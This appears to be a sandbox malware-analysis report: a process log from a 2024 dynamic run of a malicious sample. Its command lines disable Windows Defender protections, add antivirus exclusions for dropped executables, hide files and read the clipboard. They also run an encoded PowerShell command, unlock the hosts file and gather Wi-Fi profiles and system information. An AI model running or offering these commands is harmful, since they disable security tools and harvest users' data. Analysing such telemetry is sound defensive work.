                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                        Start time:16:10:42
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:16
Start time:16:10:42
Start date:19/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:17
Start time:16:10:42
Start date:19/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:16:10:42
Start date:19/12/2024
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
Imagebase:0x7ff7a3bb0000
File size:23'040 bytes
MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:16:10:42
Start date:19/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:16:10:45
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff650120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:16:10:45
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff650120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:16:10:45
Start date:19/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:16:10:45
Start date:19/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:16:10:45
Start date:19/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff6d7870000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:16:10:45
Start date:19/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff6d7870000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:16:10:45
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:16:10:45
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:16:10:46
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                                        File size:810'496 bytes
                                                                                                                                                                                                                                        MD5 hash:E8AF4D0D0B47AC68D762B7F288AE8E6E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 67%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:16:10:46
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                        Imagebase:0x7ff681f80000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:16:10:46
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:16:10:48
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 16:10:48
Start date: 19/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase: 0x7ff650120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 16:10:48
Start date: 19/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase: 0x7ff650120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 16:10:48
Start date: 19/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase: 0x7ff650120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 38
Start time: 16:10:48
Start date: 19/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase: 0x7ff650120000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 39
Start time: 16:10:48
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 16:10:48
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 16:10:48
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 16:10:48
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 16:10:49
Start date: 19/12/2024
Path: C:\Windows\System32\tree.com
Wow64 process (32bit): false
Commandline: tree /A /F
Imagebase: 0x7ff6c98f0000
File size: 20'992 bytes
MD5 hash: 9EB969EF56718A6243BF60350CD065F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 45
Start time: 16:10:49
Start date: 19/12/2024
Path: C:\Windows\System32\systeminfo.exe
Wow64 process (32bit): false
Commandline: systeminfo
Imagebase: 0x7ff60c800000
File size: 110'080 bytes
MD5 hash: EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                        Start time:16:10:49
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                        Start time:16:10:49
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                        Imagebase:0x7ff6d7870000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                        Start time:16:10:49
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:netsh wlan show profile
                                                                                                                                                                                                                                        Imagebase:0x7ff75bcf0000
                                                                                                                                                                                                                                        File size:96'768 bytes
                                                                                                                                                                                                                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                                        Start time:16:10:49
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                                        Imagebase:0x7ff6db890000
                                                                                                                                                                                                                                        File size:77'312 bytes
                                                                                                                                                                                                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                        Start time:16:10:50
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                        Start time:16:10:50
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                        Start time:16:10:51
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                        Start time:16:10:51
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6c98f0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                                        Start time:16:10:51
Start date:19/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:16:10:51
Start date:19/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:16:10:52
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:0x7ff650120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:16:10:52
Start date:19/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:16:10:52
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff650120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:16:10:52
Start date:19/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:16:10:52
Start date:19/12/2024
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:0x7ff7a3bb0000
File size:23'040 bytes
MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:16:10:52
Start date:19/12/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff6c98f0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:16:10:53
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Imagebase:0x7ff650120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:16:10:53
Start date:19/12/2024
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
Imagebase:0x7ff6cc730000
File size:2'759'232 bytes
MD5 hash:F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:16:10:53
Start date:19/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:0x7ff650120000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:65
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:66
                                                                                                                                                                                                                                        Start time:16:10:53
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
